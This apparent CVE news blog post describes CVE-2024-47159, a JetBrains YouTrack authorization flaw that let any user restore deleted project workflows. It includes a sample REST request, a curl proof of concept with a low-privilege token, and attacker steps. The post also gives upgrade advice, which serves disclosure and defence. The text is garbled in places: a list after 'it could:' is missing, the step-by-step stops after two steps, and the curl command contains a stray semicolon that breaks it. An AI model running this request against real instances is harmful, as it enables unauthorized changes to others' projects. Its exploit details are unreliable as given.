CVE CyberSecurity Database News

CVE-2024-47159 - How JetBrains YouTrack Workflow Restore Flaw Lets Unauthorized Users Meddle With Your Projects

Poster -

> Summary:
JetBrains YouTrack before version 2024.3.44799 contains a critical security flaw, CVE-2024-47159, where users without sufficient permissions could restore deleted workflows linked to projects. This exclusive post dives into how the vulnerability works, its real impact, exploitation details, and includes code snippets to demonstrate the flaw—all in plain American English.

What is JetBrains YouTrack?

JetBrains YouTrack is a popular issue tracking and project management tool used by teams worldwide. Its workflow feature allows you to automate complex business rules and manage project processes.

About CVE-2024-47159

- Vulnerability ID: CVE-2024-47159

Description

In affected YouTrack releases, any user — even without admin or project-level privileges — can restore ("undelete") workflows that were previously attached to a project. Workflows define business logic (like auto-assigning tasks or sending notifications), so restoring them can alter project behavior without proper oversight.

Why This Matters

Workflows can influence permissions, issue processing, and notifications. If an unauthorized team member can resurrect custom (or even malicious) workflows, it could:

Buggy Behavior

Prior to version 2024.3.44799, the REST endpoint for restoring a workflow did not check user permissions correctly.

Any user could send this kind of API call to bring a deleted workflow back to life

POST /api/admin/workflows/{workflowId}/restore
Authorization: Bearer <user-token>
Content-Type: application/json

{
    "projectId": "PROJECT_ABC"
}

Even if <user-token> belonged to a non-privileged user, YouTrack would restore the workflow if {workflowId} was valid and attached to the project.

Proof-of-Concept (PoC) with curl

curl -X POST \
  "https://your-youtrack-instance.com/api/admin/workflows/<id>/restore"; \
  -H "Authorization: Bearer <lowpriv-token>" \
  -H "Content-Type: application/json" \
  -d '{"projectId":"PROJECT_ABC"}'

Replace <lowpriv-token> with your user token.

If successful, you’ll see the workflow reappear attached to PROJECT_ABC — even if your user shouldn’t have the rights to do this.

Step-by-step

1. Recon: Attacker (a normal YouTrack user) lists all deleted workflows, possibly via /api/workflows?visibleForCollaborator=true.
2. Selection: Attacker notes the IDs of previously deleted workflows attached to important projects.

Impact: The project now follows potentially outdated, buggy, or malicious automation rules.

Example: An earlier workflow that closes issues automatically on creation gets restored, causing real headaches for ticket management.

Disruption: Projects may start following obsolete or broken rules.

- Security risks: If an attacker restores a workflow with logic to escalate privileges or leak notifications, sensitive info can be exposed or rules bypassed.
- Hard to audit: Teams may not realize a rule’s been re-enabled, causing subtle long-term errors.

Patch ASAP: Upgrade to YouTrack 2024.3.44799 or newer.

- Official release notes: YouTrack Release Notes

More Info and References

- NVD CVE-2024-47159 Entry
- JetBrains YouTrack Announcement
- YouTrack Changelog

Summary Table

| Impact | API Access Needed | Attack Complexity | Authentication Required |
|----------------------|------------------|------------------|------------------------|
| Workflow tampering | Yes | Low | Yes (any user) |

Conclusion

CVE-2024-47159 is a simple but dangerous oversight. Even trusted environments sometimes trip over permission design, as this YouTrack bug shows. If you’re a YouTrack admin, upgrade today, review your workflow history and make sure only the right folks have the keys to your project logic.


*Stay secure, patch often, and don’t let old workflows haunt your projects!*

Timeline

Published on: 09/19/2024 18:15:09 UTC
Last modified on: 09/24/2024 18:09:50 UTC